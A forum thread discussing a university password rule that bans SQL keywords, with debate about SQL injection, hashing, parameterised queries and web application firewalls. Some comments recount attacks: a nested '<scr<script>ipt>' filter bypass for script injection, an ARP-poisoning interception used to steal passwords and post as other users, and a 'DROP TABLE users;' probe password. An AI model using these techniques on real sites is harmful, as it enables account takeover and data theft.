return to table of content

Password may not contain: select, insert, update, delete, drop

civilized
46 replies
1d4h

I expect this will attract a lot of criticism, but I actually think it's a good idea, at least in some cases.

There are a lot of people writing bad code and bad system architectures for their organizations. There are not enough people with the competence, organizational power, and time to catch what's bad and force change in those organizations. In the US you are probably forced to do business via many such terribly coded websites, e.g. your local healthcare provider. In such cases, it might be better if we assumed the implementation might be as awful as it commonly is, and recommended mitigations based on that.

It's also easy for people to test if the website actually allows the nominally prohibited password patterns and complain to some oversight authority if so. Whereas it's not so easy to test, from the outside, whether it's really been done the right way.

It's inelegant and tragic, but in the end it might be a good idea to accept that things are often done poorly and without adequate oversight, and consider what mitigations can prevent the worst outcomes in these cases.

oliwarner
17 replies
1d3h

Your password should not go anywhere near a database.

It should be salted and hashed a few hundred thousand times and that compared to the salted, hashed version stored on file.

If you can't even manage that, you have no business writing software that can store credentials. And I mean that. Software security starts with acknowledging that data is toxic and will bankrupt you if you refuse to respect it.

civilized
11 replies
1d3h

Many people in positions of great responsibility don't do what they should. What do we do about that?

oliwarner
9 replies
1d2h

I wouldn't be telling anyone to implement crappy password policies as a workaround.

I'd tell them to do it properly or not at all, and remind them that in many jurisdictions, knowingly implementing poor data controls earns you some actionable liability. PII is no joke.

This isn't controversial when you're telling people you can't do your own gas work without certification, or electrics without experience. It's okay to demand competence.

civilized
7 replies
1d2h

What you're recommending is the status quo. The status quo has led to me receiving regular letters informing of massive security breaches where all my PII is disclosed and I have no recourse of any kind, other than possibly spending my life fighting a giant company in a class action lawsuit when I have no time or skill set to do so.

oliwarner
6 replies
1d1h

What I'm recommending is just part of the bare minimum security requirement for an authentication system. SQL parameterisation, transport encryption, input validation (and more) are all as important.

Stopping SQL keywords is a distraction dressed up like security. It's harmful.

civilized
5 replies
1d

Stopping SQL keywords is a distraction dressed up like security. It's harmful.

We are talking about how to mitigate harm from people who are already doing the wrong thing. Saying that this distracts from doing the right thing misses the point. They are already doing the wrong thing. You saying they should not do the wrong thing does not stop them from doing the wrong thing. Once again, your proposal is the failing status quo.

oliwarner
4 replies
22h48m

I'm really trying to meet you halfway here but I can't imagine a scenario where I had such low confidence in a third party application that I'd wrap it in input-filtering cotton wool and feel like that was safe enough.

A project that both stores plaintext passwords and fails to use parametrisation (something that's been standard practice for over two decades) is untrustable. It's an untenable liability.

Maybe I'm wrong. Could you explain when you think this would be acceptable?

civilized
2 replies
22h36m

It's not that I think it's acceptable. I'm thinking about how to reduce the harm of people doing unacceptable things that we can't stop them from doing. I would be very transparent about this. I would say this is harm reduction for people who are doing the wrong thing and is a waste of everyone else's time, but we have to do it anyway because software engineering has failed to govern itself as a profession and the government has failed to hold it accountable for its disasters.

The key thing is that it's both easy to test and would stop many attacks. Anyone can check whether the password field will take these forbidden keywords and patterns.

No question it's a pathetic thing to have to resort to, but pathetic is where things are at right now.

oliwarner
0 replies
9h11m

If they're storing raw data without parameters, you can't have any confidence they do that with every other SQL query. You'd have to block every SQL token from every input.

Imagining we're happy to sacrifice these words to the gods of security theatre, what layer are you suggesting this goes? Browser level just means hackers can make raw requests. HTTPDS could block it, like an overzealous WAF, but that still needs implementing. Service providers shouldn't be able to see this stuff because of transport layer security.

There's no sensible way to make this make sense.

I do agree that a lot of entities are not adequately prosecuted for their incompetent data handling but fixing that seems far more realistic than banning the word "drop", everywhere.

lmm
0 replies
19h39m

Does it really reduce harm? Bypassing something like this should be, like, one checkbox in metasploit. It's like requiring all walls to be wallpapered to make sure no-one spots any cracks in the walls.

pixl97
0 replies
3h5m

https://en.wikipedia.org/wiki/Swiss_cheese_model

Most software you use is untrustable. You get a binary and you pray the vendor isn't an idiot. Even if you watch all the SQL commands it does in normal operations, you can't be sure an attacker cannot send some operation you don't know about and do a regular SQL command.

cbsmith
0 replies
21h50m

It's okay to demand competence, but I wouldn't expect competence to materialize overnight.

x0x0
0 replies
22h54m

Do what we've successfully done for hundreds of years: Fine and potentially prosecute them. Stop pretending software engineers are special snowflakes, and apply the same standards we use for bridges, roads, etc. None of those are perfect, but they do manage to do things like stop using known-bad materials, which is broadly equivalent to allowing script injection via password fields.

cbsmith
4 replies
21h51m

Your password should not go anywhere near a database.

It should be salted and hashed a few hundred thousand times and that compared to the salted, hashed version stored on file.

If you can't even manage that, you have no business writing software that can store credentials

That's misunderstanding the nature of the vulnerability. It's not about where the password is stored, but where it is entered. Before it can be salted & hashed, there's software that has to decide where the password input starts and ends. If it gets that wrong, that's how you get the vulnerability.

It's not even clear that there is a vulnerability problem here, though there is obviously a usability/UI problem. It could very well be that having those words in your password doesn't compromise security anywhere, but some systems might reject the password before even attempting to authenticate with it.

oliwarner
1 replies
21h32m

It might be a method to avoid trigger an overenthusiastic WAF, but these are all SQL tokens and keywords. It seems far more likely that they've blocked them in a desperate effort to catch injection attacks.

There might not be an actual attack vector, they might block these words in all inputs. It just smells like incompetence.

pixl97
0 replies
3h54m

WAFs commonly block SQL keywords to prevent SQL injection, so it still holds that the WAF could do it.

deathanatos
0 replies
15h37m

That's misunderstanding the nature of the vulnerability.

No, they're 100% correct. If the password is properly stored, there's no possibility of injection, because what gets sent to the database is something like a hex string, or just a bytestring, depending on reprsentation.

It's not about where the password is stored, but where it is entered. Before it can be salted & hashed, there's software that has to decide where the password input starts and ends. If it gets that wrong, that's how you get the vulnerability.

???

Where it is entered looks like this:

  <input type="password" name="password">
… the actual text of the password makes no appearances, ever.

Whatever code you're using to generate HTML/DOM nodes, or SQL queries, should be parameterized and automatically escaping all inputs. If it isn't, that's the security issue, and trying to kludge around it with idiotic restrictions won't work. (Other commenters have already alluded to the problems with the OP's attempt.)

But even then, a password should never hit either of those interfaces: there's no reason to render it into the DOM, or into SQL.

(There are some other comments about this might be to help users work around failures in a WAF. That could be, but it's orthogonal.)

8note
0 replies
15h39m

but where it is entered.

Hmm. This strongly reminds me of gpt promt injection. I guess why they're both called injection attacks

wongarsu
9 replies
1d3h

If an organization has such a password policy, that can be interpreted as the person in charge of setting this policy thinks their organization doesn't have enough people with the competence and organizational power to prevent SQL injection vulnerabilities. Which would reflect poorly on any institution, but especially a university (which should be a bastion of people with competence and organizational power).

As for common password advise, my take on your argument would be that we should all be using these keywords in our passwords to quickly surface these bugs, lest they be hidden and only used by attackers.

civilized
3 replies
1d3h

Counterpoint - however pathetic it may be, it's better that they publicly owned up to their lack of confidence in this way. The question is, what do we do about it once we see something like that?

wkat4242
2 replies
22h57m

The question is, what do we do about it once we see something like that?

Run away and stay as far away from their products and services as possible.

danesparza
1 replies
21h48m

It's a university

wkat4242
0 replies
21h4m

Ok don't go there to study CS :)

patrakov
1 replies
1d3h

It can be interpreted as you suggest, but does not necessarily come from the person in charge. It might mean that auditors forced the installation of a WAF because of $REGULATIONS (irrespective of the actual code quality) and refused to allow weakening the rules for password fields.

EDIT: as they don't actually check for all the banned strings, the "auditor + mandatory misconfigured WAF" hypothesis expressed above is not valid in this case. But let it stay as an otherwise-plausible explanation, or maybe something that was valid in the past.

wongarsu
0 replies
1d3h

The WAF hypothesis still holds if you assume the password change page is governed by the same WAF. The WAF would reject any new password it finds offensive, and the "rule" about not using certain SQL keywords just matches people's fuzzy understanding of why these passwords are rejected. It was probably even true, a couple WAF rule updates ago.

SoftTalker
1 replies
23h5m

especially a university (which should be a bastion of people with competence and organizational power)

Generally the opposite. University staff positions pay pretty poorly compared to what the most competent people can earn elsewhere.

There are some bright staff people at universities who are there for other reasons besides the pay, but the competence of an average university staff software developer is not great.

This is also why over the past two decades universities have trended to SaaS subscriptions rather than building software in-house

cbsmith
0 replies
22h0m

Yeah, there's very much a "cobbler's children have the worst shoes" aspect of this that some people don't get.

mkl
0 replies
21h55m

especially a university (which should be a bastion of people with competence and organizational power).

Those people are not the ones running the IT systems. Even the software engineering and information systems departments have no say. IME university IT are understaffed, outsource a lot (often without a choice), and often have to follow decrees from higher management that don't seem to have been thought through.

jchw
7 replies
1d2h

I disagree. It may seem good on paper, but it gives you too much of a false sense of security. Security measures like this often seem to work, but they are papering over a deeper problem. Usually this is being done because user input is not being handled carefully, and if so, the assumption that blocking some keywords "defangs" potential exploits is usually easy to prove false. Consider the case of eBay and JSFuck[1].

I dislike the mentality that leads to this; WAFs, lazy pentesting and compliance checkboxes have created a substantial body of absolute bullshit security theater and I have absolutely zero doubt that this has convinced companies it's "safe" to put insanely poorly written software partially out on the open internet and that they've "done their due diligence" so to speak. And then I get a letter in the mail apologizing that my most confidential information has yet again been leaked by some company I barely or didn't have any real choice to give my data to. I'm sure they all care deeply about my data and that's why it was stolen using decades-old Java serialization library vulnerabilities.

[1]: https://blog.checkpoint.com/research/ebay-platform-exposed-t...

civilized
6 replies
1d

A lot of critical responses here are saying "this distracts from getting people to do the right thing". I'm open to that, but what is the plan for forcing organizations that are doing the wrong thing to do the right thing? We're talking about businesses that mismanage the sensitive data of millions of people. "They should be doing things right" doesn't seem like an adequate response to this situation.

jchw
4 replies
23h4m

Correct, we should be legally enforcing that they do the right thing, with legislation that has actual fangs, for companies like Equifax. It should be a potential bankruptcy event when you leak most of America's social security numbers through sheer incompetence.

The problem is that WAF-style security-theater is being enshrined as the industry standard instead, which means that we're just going to get more of these problems instead of less. In other words, a half-measure like this doesn't just distract from doing the right thing, it's actually literally useless for any real security, and instead it's more likely to allow serious security issues to go unnoticed for a much longer period of time.

jstarfish
2 replies
18h40m

legislation that has actual fangs, for companies like Equifax. It should be a potential bankruptcy event when you leak most of America's social security numbers

Immutable identifiers should never have this much weight. When your encryption key is compromised, you roll it. When your SSN is leaked, you're doing damage control for the rest of your life. This problem did not begin with Equifax.

It's a 7-digit number that encoded most people's birth region in it until two decades ago and gets asked for by all sorts of randos having anything to do with finance. The problem here is that something so readily shared and easily compromised and impossible to change has this much weight in our identification protocols.

jchw
0 replies
3h7m

I truly feel that is neither here nor there. As long as we don't fix what's wrong with Equifax, we can trust absolutely nothing to stay private with them or similar entities for any substantial amount of time. Therefore, we actually need to fix this problem anyways. Having just one of these fixed will not solve much.

I am receiving approximately one parcel per month informing me of a new data breach.

bruce511
0 replies
18h24m

You are not wrong, but I'd argue that mutable ID methods would be worse.

Ok, context and perspective will matter a lot here. If you are wanting to hide from authority then mutable id sounds good. If you are wanting to "know the history" of a person then mutable is bad.

In our social contract the "inability" to change id is baked into the way be behave, and the consequences for bad behavior.

Equally there are lots of good reasons to be able to get a quick history of say a prospective employee, loan recipient, tennant, supplier, customer, and so on.

If I can apply for a new Social Security number every month/year then that number does become useless as a form of id.

But it would then just need to be replaced with something else. Too much of what we do is predicated on our historical behavior. Having a 12-month limit on identity would break, well, just about any kind of contract.

And in most contract situations uou most definitely want to know "who" you are contracting with.

civilized
0 replies
22h40m

I agree with you about security theater. The only reason I'm favorable to this approach is because it seems to provide accountable harm reduction in this case. It would stop many typical attacks while being very easy for any random government bureaucrat to test compliance with.

redeeman
0 replies
17h18m

I'm open to that, but what is the plan for forcing organizations that are doing the wrong thing to do the right thing?

i'd say figure out how bad what they did is. Not hashing and building sql strings like that: go to jail for a long time.

Gross carelessness with private data: go to jail for a very long time.

About the same time as if you purposely published the data, or purposely dropped a table, because thats about what you did. If you dont have the competence, you have no business writing such a system. If you dont know how to calculate a bridge that wont collapse, or dont know how to follow the plans and build it properly, you have no business being there.

ipython
4 replies
1d3h

But why would you ever send a plaintext password into a sql query?

petee
1 replies
1d3h

Since being clever is often a footgun, I'll admit to one idea I had years ago; I never really gave it the smell test, and it only existed for a personal project. But if one person thought of it, others may have as well.

I was learning to write sqlite C functions for fun, and thought since storing plain passwords has been such an issue, why not offload the responsibility from the programmer and let the db handle it fully -- consume plaintext, salt, hash, etc, and could transparently upgrade algorithms when necessary.

Luckily I've learned enough to recognize that my skillset is not of the level necessary to fully evaluate the risks. Today the idea makes me feel uncomfortable.

paulmd
0 replies
16h22m

one general problem with this (and also audit logging) is making sure that such changes can't be rolled back. I think the consensus the last time I looked at it was to do it in a separate connection or batched at the end of the main transaction. but audit logging is just such a tremendous pain in general and everyone's got their own specific requirements.

I think in general you would not want to do this in the database anyway (definitely not unless it's sharded and not really even then). You are taking that hashing load off your application servers and moving it inside the DB after all. When your DB is out of CPU, it's out, they're tough to scale. And in SQLite you are holding the DB write lock for longer, which serializes every other thread that needs to write. That's also true of holding connections/resources in traditional DBs. It's notionally fine for toy problems and you can probably do "clever" shit like sharding uuids across multiple files by hash to scale a bit further. But increasingly, even as someone who likes the idea of a "richer" interface to RDBMS, and doesn't mind writing SQL functions/triggers/views where it makes sense, I think the database really just not is the place for unnecessary gizmos on performance grounds either. Don't put hashing in your DB.

civilized
0 replies
1d3h

Because you are lazy, irresponsible, and/or incompetent.

AndroTux
0 replies
1d3h

Or anywhere else except a hash function for that matter?

_heimdall
1 replies
1d3h

What is the attack vector this protects against though?

If the authentication flow is doing anything other than salting/hashing the password and then throwing away the original plaintext password, the entire system really shouldn't be used at all.

civilized
0 replies
1d3h

It (partially) protects against the attack vector in which the system was badly coded and simply does not do what everyone with basic competency insists all systems must do.

I strongly suspect that this is the most common attack vector in cybersecurity.

zzyzxd
0 replies
1d

I find this to be a common defense in depth trap. A lot of engineering effort get threw at the wrong layer, when the problem can be much more efficiently solved on another layer.

It renders the whole organization working in fear -- When you have to worry about the system inserting password in plaintext into a database table, there are also a million other terrible things that can go wrong in this system, like what if your DBA copy-paste a SQL from stackoverflow? There's just endless work.

If your org has incompetence engineers, then maybe just don't let them implement their own authentication system. Use popular open source frameworks and/or buy a commercial product.

vldr
0 replies
9h49m
jknoepfler
0 replies
17h5m

An unhashed, unsalted password should literally never touch a database.

Which is to say this kind of sanitization on passwords is meaningless if the barest of security standards are in place.

Retr0id
30 replies
1d4h

Optimistically, perhaps this requirement stems from an overzealous WAF

berkes
14 replies
1d4h

That, or some poorly architectured "framework" or toolkit.

Others in the comments see this as "proof" that the application has poor security. I don't think we can draw that conclusion. We can, however, draw the conclusion that some part of the stack is poorly implemented.

junon
12 replies
1d4h

I mean, this is a gross misunderstanding of how user input makes its way into a database safely. If you're putting out error messages like this it's a giant red flag.

mikkom
7 replies
1d4h

And top of that, password should NEVER be stored to database

eddd-ddde
4 replies
1d2h

It's normal for them to make it to an executed SQL query.

duskwuff
3 replies
22h50m

No, it isn't.

If a user's password leaves the web application in any form other than a hash, something nonstandard and probably bad is going on.

Wingy
2 replies
20h46m

Hashing can be done in a stored procedure. Maybe the organization decided that it's better for the DBA to handle hashing. Nonstandard maybe but not necessarily bad.

duskwuff
1 replies
20h27m

Hashing can be done in a stored procedure. [...] Nonstandard maybe but not necessarily bad.

No, it's unambiguously bad. You're transmitting a cleartext password to a system which doesn't have a business need to know it, and which wasn't designed to process secret data. There's a substantial risk that the database may leak that data in some unexpected way, e.g. by logging it when an error occurs or by showing the parameter in a process list. Worse, a stored procedure can potentially be covertly modified to store or exfiltrate the password while hashing it.

junon
0 replies
19h46m

To be clear, this only improves security if the user reuses passwords.

junon
1 replies
1d4h

Well, not in plaintext.

klyrs
0 replies
1d

That's why you hash the password with an SQL built-in hash function. For security! But the password is still in plaintext inside the query so you can retrieve it from the logs for... security?

(I joke, but 20 years younger me, self-teaching php and security etc? Who knows what she'd think of this)

graemep
3 replies
1d4h

It is also very common not to do things right. https://www.bbc.com/future/article/20160325-the-names-that-b...

That article is a few years old now and things should have got better, but even by 2016 everyone should have known properly sanitising inputs was critical for a decade or two.

junon
2 replies
1d4h

Right but that's not really an excuse not to do them right.

pixl97
1 replies
2h55m

You're working at the premise backwards...

One of the systems is already wrong. The excuse not to do the system right is monetary cost of fixing the broken system.

Out of all the excuses in the world, money wins.

junon
0 replies
2h0m

EDIT: responded to the wrong comment, apologies.

I really don't understand your point. If I hash on the browser the hash is still being sent to the server. A MitM or sniffing attack can just send the hash and log in. It doesn't actually protect the user at all unless they're re-using the password elsewhere. This also assumes that you're using a seeded hash of some sort, or a multi-round hasher with settings unique to every other website. Otherwise you're still going to run into stuffing and collisions.

So for sites where the plaintext password is sensitive (password managers etc) that's important. For most sites, it's not inherently wrong not to hash passwords in the browser, though it does protect against password reuse.

I'm not saying you're wrong, I just don't think you're accurately portraying the problem you're fixing.

cookiengineer
0 replies
21h37m

You can just try out some || concated strings and an or statement to verify the lack of security. It's not like it's a secret how to do SQL injections in 2024.

Bypassing this kind of filter is literally the second picoCTF SQL injection level, which is intended for high school STEM students.

turminal
9 replies
1d4h

That would imply WAF gets to see unhashed passwords, so not good at all.

hiatus
5 replies
1d4h

How would a WAF do its job if it can't see the request payload?

wongarsu
4 replies
1d3h

There are various schemes where the password is salted, hashed or prehashed on the client side, to various effectiveness. They have never been really popular and the advent of ubiquitous https probably made them even less common, but they do exist. They do help protect you from your own WAF though.

d-z-m
3 replies
1d3h

can you elaborate on this? Or link something that does? My intuition is that whatever gets sent over the wire is effectively the password. Not sure how the server could validate some rolling hash of the password (based on like a timestamp or something) without having to store the pre-image(i.e. the raw password).

wongarsu
0 replies
1d3h

Yes, that's the common counter argument. Your hash has now just become the password, and no amount of clever salting really solves that.

It still prevents the server (and any proxies, MitM attackers, etc) from seeing the plain-text password, which can help protect the user if they reused the password somewhere else. Assuming the client wasn't also compromised, which is very likely in web applications but maybe a valid scenario in apps and desktop applications.

The other imho valid idea is that you can run a key derivation function client-side (e.g. salted with the user-name), in addition to running your normal best-practice setup server side. This can allow you to run more expensive key derivation which provides more protection if your database is leaked, while also making dictionary attacks on your authentication endpoints less viable.

liversage
0 replies
20h49m

The SRP Authentication and Key Exchange System does not send the password from the client to the server. This scheme is supposedly used by Blizzard when authenticating users in some of their online games.

https://www.rfc-editor.org/rfc/rfc2945

https://security.stackexchange.com/questions/18461/how-secur...

aidenn0
0 replies
15h25m

If your password is 123456, then client-side hashing will make this less obvious. If the site is compromised in a way that reveals passwords, then it will not trivially work on other sites that use your password. In addition, stronger total hashing can be used, since if your server can do M hashes persecond and your client can do N hashes per second, the total number of hashes to allow a one second login are (M/$NUMBER_OF_CONCURRENT_LOGINS)+N which is strictly larger than (M/$NUMBER_OF_CONCURRENT_LOGINS).

SRP[1] is an even better improvement, where an eavesdropper cannot authenticate as you; there is a challenge-response to login.

1: https://en.wikipedia.org/wiki/Secure_Remote_Password_protoco...

wkat4242
0 replies
22h54m

These are SQL commands. The WAF would see the password unless you pre-hash it on the client side in JavaScript (not a bad idea). But the database really should never ever see the plaintext password. If it does you're doing a lot more wrong than just being open to SQL injection.

rassimmoc
0 replies
1d3h

why would waf see hashed passowrds? passwords are hashed by application, so that is after waf does its job and hands request over to app.

jesprenj
0 replies
1d3h

WAF always sees unhashed passwords -- passwords are sent TLS encrypted in a POST body (unhashed) and are hashed by the server software -- and that's regardless of the password policy.

g4zj
4 replies
1d4h

What does WAF stand for?

travoc
0 replies
1d3h

One of the things that devs can blame when our app doesn’t work in production.

thedougd
0 replies
1d4h

Web application firewall

It’s a reverse proxy that inspects requests for bad stuff like sql injection.

dharmab
0 replies
1d4h

Web Application Firewall

amiljkovic
0 replies
1d4h

Web Application Firewall

mysterydip
28 replies
1d4h

Obligatory meme-y "tell me you're not sanitizing input without telling me". Also not storing hashes of passwords, because then it wouldn't matter what the input is.

tester756
13 replies
1d4h

Actually they do sanitization by blacklisting

"Blacklist sanitizing cleans the input by removing unwelcomed characters such as line breaks, extra white spaces, tabs, &, and tags."

But still this is not a way, input sanitization is bullshit.

Using query parameters, thus inserting raw input into already built abstract syntax tree of SQL query

is the correct solution since SQL injection is about affecting tree composition

hobs
6 replies
1d4h

You don't even have to do that, just escape single quotes and you've defeated everything but homomorphic attacks as far as I can tell.

dylan604
3 replies
1d3h

That’s a comment that makes me think someone read a blog 15 years ago, and never kept up with modern ways of doing things.

hobs
2 replies
1d

Cool - but neither of your comments addressed that I am still correct afaict, if you care about query plans and such parameterization is important, but not getting injected on is a different problem.

dylan604
1 replies
23h40m

look, if you still want to live like it's 1999, then sure, go ahead and wrap your params in quotes like you think you can. just don't come crying to the rest of us that have more than once provided you with better solutions when you get attacked. i mean, even using the old style escape methods would be better than your appending of quotes idea.

hobs
0 replies
4h15m

I didn't say I don't use parameterization, and I still haven't heard what the difference is between the old style escape methods and the quotes I mentioned, just you being salty :)

tester756
1 replies
1d4h

Why use unreliable solutions that rely on various assumptions that may change in the future and rely on you not forgetting about even 1 case where it wouldnt work

When you can use approach which fundamentally prevents SQL injection?

hobs
0 replies
1d

I didn't say you should, I am just noting that there's no complexity in the solution required, it's simple and yet still many people don't do it.

skottk
2 replies
1d4h

Parameterized SQL is your friend here.

mysterydip
1 replies
1d4h

Yeah, that's what's mapped in my head to "sanitizing input" in these cases, as it's the correct way to handle them. I should've unrolled my brain shortcut for the discussion.

dylan604
0 replies
1d3h

Before Parameterized SQL was a thing, sanitizing was the thing. There’s a lot of escape_string() type of methods out there.

reeeeaway
2 replies
1d3h

Looking at the postgres JDBC source, it sanitizes parameters when prepared statements and parameterization is used. Different implementations may do different things here though

tester756
1 replies
1d3h

Could you describe it conceptually how they do it?

reeeeaway
0 replies
1d2h

The method doAppendEscapeLiteral (Line 66) is a good example; https://github.com/pgjdbc/pgjdbc/blob/master/pgjdbc/src/main...

I didn’t take notes all the way down, but at the end of the day this method is invoked when a prepared statements’ parameters are being bound

ajross
8 replies
1d4h

Also not storing hashes of passwords, because then it wouldn't matter what the input is.

That only tells you they don't hash the passwords in the client. Likely the protection ("protection") is for the input validation layer, not the password backend itself.

sevensevennine
2 replies
1d4h

Don't hash the password on the client. That just changes the password to the hash of the password.

Parameterize the SQL on the server instead of concatenating strings.

hn_acker
1 replies
1d2h

If you're using a third-party reverse proxy, then the third party will have access to the user's password. What's the simplest way to prevent the third-party from knowing the password? Would adding an encryption layer between the user and the actual website owner be both feasible and sufficient for the average website owner?

Falmarri
0 replies
23h24m

Don't use reverse proxies you don't trust

TacticalCoder
2 replies
1d4h

Is it a slow sunday for me or... If you hash the password on the client and send the hash then hash is the password. And if you then have, for example, a DB leak with username and hashes, you don't need the password anyway because you can just send the hash and log in? (but then it's sunday and I need more coffee so I may be wrong)

gvx
0 replies
1d3h

That is correct.

The client sends the encrypted (via HTTPS) but not hashed password to the server, both for changing your password and checking your password. So the server receives the password in plaintext but shouldn't store it.

Whatever the client sends to the server, an attacker can send too.

andy81
0 replies
20h52m

You're not the first to come up with that exploit-

https://en.wikipedia.org/wiki/Pass_the_hash

howrar
1 replies
1d3h

How could the validation layer be affected by the presence of these substrings?

ajross
0 replies
1d2h
GuB-42
4 replies
1d4h

Thinking about it, it can also be that the input is sanitized a little too much.

Imagine the user uses "select_mypassword" as a password. The sanitizer kicks in and silently mangles your password, resulting in another password being stored than the one you entered, effectively locking you out. Or maybe it just fails with an obscure error because some overzealous countermeasure triggered. I wonder what using the EICAR file as a password would do btw.

Also, while the password may be stored properly (hashed), the password still transits in plaintext before it is stored or verified. So even with hashing, you can still be vulnerable to injection.

MadnessASAP
3 replies
1d3h

Presumably you would apply the same sanitizer at login time to whatever password the user enters. If the input is the same and the transform is the same then the output will be the same.

Hopefully you don't actually have to do any of this because your backend wasn't written by monkeys on typewriters.

patrakov
1 replies
1d3h

This relies on a false assumption that the sanitizer is static.

MadnessASAP
0 replies
1d2h

If we're to continue with this thought experiment in doing the dumb thing. Clearly you would version your sanitizer and store which version you used when saving the password. That way you can ensure the same version is used against future user inputs.

GuB-42
0 replies
1d3h

What may happen is that every step is siloed in some way and every team assume the others are monkeys on typewriters. From a security perspective, it is not necessarily a bad thing, but it can make the user experience terrible.

For example, I may write some piece of software that refuses to write files with spaces in them, because I suspect that later on, some shell script will process them and it is very common for poorly written shell script to break with spaces in file names. But it may turn out that unexpectedly, the people who write the back end are competent and deal with spaces just fine. But on their side they may expect me to be be the monkey and say, avoid replying with Unicode characters, assuming my code will break if it gets something that is not an ASCII printable character.

So in the end, the user will have neither spaces in file names nor proper Unicode support, even though the software wouldn't have any problem with that if two team properly communicated and didn't think of each others as monkeys.

matsemann
26 replies
1d3h

Can not contain "script".

I hacked a big social platform in my early teens (Nettby.no), since they just did a removal of all banned words, including <script>. I instead wrote <scr<script>ipt> in my profile bio, and after their removal I had a valid html tag injected into the webpage and full control of anyone visiting my page..

mtlmtlmtlmtl
10 replies
20h6m

Hah, I hacked Nettby in school too, good days.

Nettby had no HTTPS, so I did an ARP poisoning MITM and stole everybody's passwords. Then I posted random nonsense from people's accounts and watched the chaos ensue(did no snooping, even 14yo me had a semblance of ethics somehow).

coolThingsFirst
9 replies
19h49m

Eli5 this attack pla

cqqxo4zV46cp
4 replies
19h19m

It should also be said that HTTPS was seldom used outside of especially sensitive applications until ~2010 when someone packaged a HTTP MITM attack up into a handy Firefox extension. I think that Facebook used HTTPS for the actual login credential exchange, snd then bounced back to HTTP, which meant that the session cookie/s were still MITMable.

It’s insane how long it took to see widespread HTTPS adoption.

nicolas_t
1 replies
14h22m

I remember back in that time that a lot of apps had convoluted code to do this https only at login dance. All in the name of performance (because https was slower despite it being a premature optimization really). Switching to https only actually mostly helped simplify codebases...

singingfish
0 replies
10h39m

yeah, a colleague and I ripped out all of the http / https dance out of a 20 year old code base a little while back. It simplified things a lot.

roughly
0 replies
18h51m

Yes! Firesheep was the extension, and I think the combination of that and LetsEncrypt (which was in part a reaction to Firesheep) were the reason the web went from almost entirely decrypted by default to almost entirely encrypted by default in a matter of months. The capabilities had been there for years, but Firesheep made session hijacking a literal one-click affair and vividly highlighted the danger of unencrypted web traffic - it’s maybe the most impactful bit of white-hat hackery of all time.

nijave
0 replies
17h20m

Iirc Google said they'd start penalizing non https sites in search results and browser makers added much more aggressive warnings to http pages.

It caused quite a commotion among small site operators.

jcul
3 replies
19h27m

I've no idea what nettby is.

But ARP is how computers figure out what IP address is associated with a hardware / ethernet address, so they know what ethernet address to use for sending packets to a specific IP.

ARP poisoning means you flood the network with fake ARP packets saying your ethernet address has the gateway IP or whatever IP. So then the other devices will forward packets to your machine instead of the intended destination.

As nettby didn't use HTTPS it would then be trivial to capture / read the packets and figure out everyones' passwords. I.e. the messages would be plain text, unencrypted.

Not exactly Eli5, but hope it helps.

coolThingsFirst
1 replies
18h15m

Yes but isnt this possible only on LANs?

mtlmtlmtlmtl
0 replies
17h56m

Correct. I did this at school. It was early days of students being allowed laptops in class.

We weren't actually allowed internet, but the school had an extremely basic wifi network that was WEP encrypted... So naturally I broke out Aircrack-ng and ameliorated that situation. And suddenly everyone was procrastinating on nettby in class.

mtlmtlmtlmtl
0 replies
19h2m

This is pretty much the reply I'd write, so I'll just add my endorsement.

Couple more tidbits of information:

  Nettby was a Norwegian Myspace clone and it was all the rage back when I was in middle school(around 2007-2009 or thereabouts).
  ARP stands for Address Resolution Protocol.
  ARP has no security built in by default. This combined with the plaintext passwords made the attack trivial.

counterpartyrsk
5 replies
19h50m

Interesting, can you explain 'full control'?

crazygringo
4 replies
19h22m

You can run any JavaScript.

So you can show a popup saying the user needs to log in again, and then log their credentials on your own server instead.

paledot
3 replies
18h46m

Or exfiltrate their session cookie, or post spam/phishing links on their behalf...

sillysaurusx
2 replies
16h6m

Session cookies are generally not available to javascript. The latter is true though.

None4U
1 replies
15h42m

Perhaps HttpOnly wasn't as prevalent back then?

matsemann
0 replies
9h48m

Yup, no CORS either, all protections relied on having proper CSRF-tokens, but with JS access one could read that token as well.

My "hack" was mostly pretty harmless. Just did some layout changes to make my profile cooler. But the door was wide open for anything.

i_k_k
3 replies
23h21m

Well, duh: they needed to make sure to run the script twice.

ht85
2 replies
19h1m

Make it 3 times, you never know how clever those hackers folks could be!

matheusmoreira
1 replies
15h14m

Make it infinite times and stop after the output stabilizes to a constant string!

kevincox
0 replies
5h11m

I think this is actually a correct solution. Although not particularly elegant or efficient. If as long as if the string is unsafe the string will be modified. Then looping infinitely will never return an unsafe string. If it is also true that the modifications only delete characters then you will eventually arrive at a safe (or empty) string.

alanfranz
2 replies
1d

oldest injection trick ever :-)

sumo86
0 replies
23h19m

WoW

aidenn0
0 replies
15h30m

I actually think it's the second oldest, since the first would be just injecting the string itself.

account-5
1 replies
22h16m

That's easy, they should have just removed the angle brackets, job done.

matsemann
0 replies
10h32m

They allowed some html, though, which is why they didn't safely print your bio as a plain (html escaped) string.

matejn
20 replies
1d3h

Oooh! I put that string there! It was a request by management, and I still don't know why. This site doesn't store any passwords, it's basically just a nice interface to external account management.

I heard a rumour that some legacy apps have weird validation on their login fields, so students wouldn't be able to log in with passwords containing certain strings. But I don't actually know of any examples.

0x00_NULL
13 replies
19h17m

On the contrary, make all of your passwords “DROP TABLE users;”. You’ll quickly sort out which passwords are being handled so insecurely by your vendors. This would mean they both don’t sanitize user input and don’t hash or otherwise obscure your password. They are a menace to society.

jesprenj
11 replies
18h40m

AFAIUC, the reason for the word blacklist here lies in the fact that some applications have WAFs or similar software that detect malicious requests and since passwords are sent in plaintext to the WAF, they are detected as malicious exploitation attempts, if they imitate SQL injections, although your parent comment did not give any concrete examples.

nijave
4 replies
17h40m

Surely if you've resorted to blocking random SQL keywords you've already lost. SQL has a pretty big dialect not to mention arbitrary functions and procedures that might exist.

For instance, TRUNCATE isn't even in the list

selcuka
2 replies
17h18m

In real world, as a developer you can't control what IT uses for WAF, so you may have to work around it as much as you can.

At a previous job the IT set up a spam filter which used a keyword list (dumb attempt anyway), but it also searched the email headers (not only the body). As a result, we weren't able to receive email if one of the SMTP hops was named, say, smtp.essex.company.com.

jasonjayr
0 replies
15h28m

Ah, a clbuttic mistake!

Too
0 replies
11h8m

If you work as a developer and can’t do your job because of a dumb pattern matching WAF out of your control, you should find yourself a new job or set up a parallel IT infrastructure.

threeseed
0 replies
14h29m

WAFs assume that they are protecting the worst type of systems.

And so they will block requests containing DROP etc even if the systems they are fronting are perfect.

nicolas_t
1 replies
14h26m

